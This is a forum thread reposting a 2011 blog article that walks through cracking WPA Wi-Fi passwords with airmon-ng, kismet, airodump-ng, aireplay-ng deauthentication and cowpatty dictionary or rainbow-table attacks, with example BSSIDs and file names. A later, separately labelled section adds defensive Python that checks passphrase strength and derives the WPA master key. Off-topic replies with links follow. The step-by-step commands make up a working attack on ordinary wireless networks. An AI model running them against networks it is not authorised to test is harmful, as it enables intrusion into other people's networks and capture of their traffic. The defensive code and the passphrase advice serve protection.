Hacking the WPA Airwaves By Bennet

Stevyn
SysOp
Posts:1786
Joined:Mon Nov 09, 2009 10:03 am
Location:Japan
Hacking the WPA Airwaves By Bennet

Post by Stevyn » Fri May 13, 2011 9:17 am

Hacking the WPA Airwaves
By
Bennet
http://pauldotcom.com/2011/05/hacking-the-wpa-airwaves.html

It is interesting how many people believe that their wireless is secure because they are using WPA. Well, we did a test recently and were able to basically password-guess our way in with a dictionary attack, using either a straight dictionary or a rainbow table. The cool thing is I bought an ALFA USB antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: Be sure that your WPA password is an unreadable string, not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs; the tables of today are too intelligent for that.

In a nutshell, using Linux, this is how it is done:

Part I

airmon-ng start wlan0 (this puts the wireless card in promiscuous mode)

kismet -c wlan0

• close the console window to see the collection of packets
• use Alt+K to get to the top pull-down menus; turn on the ability to see the type of access point, BSSID, a guess at the IP address, and channel #
Ctrl-C to exit Kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c --bssid -w wlan0

Example:

airodump-ng -c 9 --bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0

* Note: D-Link-01.cap is where the capture of all traffic will go.

Now open another window, as we need to force a reconnect from the target (see the Note below):

aireplay-ng -a -c wlan0

Example:

aireplay-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

You will see a WPA re-key at the top of the airodump window; capture some traffic and exit, and you will have captured all the traffic in the D-Link-01.cap file.

Part III

Download either rainbow tables or a direct dictionary from Offensive Security: offensive-security.com/wpa-tables

If using hashes (rainbow tables):

cowpatty -r -d -s

Example:

cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

If using Dictionary words:

cowpatty -r -f -s

Example:

cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite

Note: If you are in an environment that has a lot of cell phones like the iPhone (and they are using their wireless to connect to the network), we found these all go to sleep when their screen is turned off, and then their wireless card wakes up when the screen is activated. So you don't need to send a de-auth; all you have to do is hang around long enough for someone to touch their iPhone or whatever cell phone and have it wake up its wireless and re-auth to the network. In other words, there is the weakest link! -- LOL!

Happy Cracking

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY--I'm Out

~Mark Bennett
http://offensive-security.com/wpa-tables
offensive-security.com

Contact me directly: Ironfeatherbooks (@) gmail.com

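As an added example (not from Bennet's article or anyone in this thread), here is a Python check that turns the passphrase advice above into code: it undoes leetspeak before looking for dictionary words, so op3nth3p0dbayd00rs is caught, and it derives the WPA-PSK master key to show why the `-s` SSID argument matters, since precomputed tables are bound to a single SSID. The wordlist, the default-SSID list and the sample passphrases and SSIDs are constructed for this example.

```python
import hashlib

# Constructed mini wordlist standing in for a real dictionary file such as the
# passwords.wpa list named in the post; the entries are assumptions for this example.
DICTIONARY = {"open", "the", "pod", "bay", "doors", "password", "dynamite",
              "welcome", "summer", "admin"}
# Constructed set of common default SSIDs: precomputed WPA tables are built per SSID.
COMMON_SSIDS = {"linksys", "dlink", "default", "netgear", "belkin54g"}
# Leetspeak substitutions that wordlist mangling rules routinely undo.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})

def normalize(passphrase: str) -> str:
    """Undo case and leetspeak: op3nth3p0dbayd00rs -> openthepodbaydoors."""
    return passphrase.lower().translate(LEET)

def dictionary_coverage(passphrase: str) -> float:
    """Fraction of the normalized passphrase covered by dictionary words (longest match first)."""
    text, covered, i = normalize(passphrase), 0, 0
    while i < len(text):
        for j in range(len(text), i + 2, -1):  # only try words of 3+ characters
            if text[i:j] in DICTIONARY:
                covered += j - i
                i = j
                break
        else:
            i += 1
    return covered / len(text) if text else 0.0

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1, 4096 rounds, salted with the SSID.
    The SSID salt is why rainbow tables are per SSID and do nothing against an unusual one."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def assess(passphrase: str, ssid: str) -> list:
    """Policy findings for a passphrase/SSID pair; an empty list means both pass."""
    findings = []
    if len(passphrase) < 20:
        findings.append("too short for a random string; use 20 or more characters")
    if dictionary_coverage(passphrase) > 0.5:
        findings.append("mostly dictionary words, even after undoing leetspeak")
    if ssid.lower() in COMMON_SSIDS:
        findings.append("default SSID: precomputed WPA tables exist for it")
    return findings

if __name__ == "__main__":
    # "example-home-7f3a" is a constructed, non-default SSID.
    for pw, ssid in [("op3nth3p0dbayd00rs", "dlink"), ("Xq7!vR2#pLm9$Wz4&Kd8", "example-home-7f3a")]:
        print(pw, ssid, assess(pw, ssid) or "passes", wpa_pmk(pw, ssid).hex()[:16] + "...")
```

The same passphrase gives a different PMK for every SSID, which is the reason a unique SSID plus a long random passphrase puts a network outside what any downloadable table covers.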

Alexander Mundy
Posts:84
Joined:Mon Nov 23, 2009 7:50 am

Re: Hacking the WPA Airwaves By Bennet

Post by Alexander Mundy » Wed Jun 08, 2011 9:22 am

I am proud of you for keeping our internet secure from cash and bandwidth grabbers,
like Google and Facebooger. Thanks.

Here are some cool links:

http://packetstormsecurity.org

http://www.c4i.org/

Alexander Mundy
Posts:84
Joined:Mon Nov 23, 2009 7:50 am

Re: Hacking the WPA Airwaves By Bennet

Post by Alexander Mundy » Sat Sep 03, 2011 4:40 am

Here's the site of an awesome org.

http://www.kateycharles.com/

They have contracts to send and warehouse info for the largest school districts in the U.S.

They're perfect. No one can mess with the public schools or their teachers unions.

NO one.
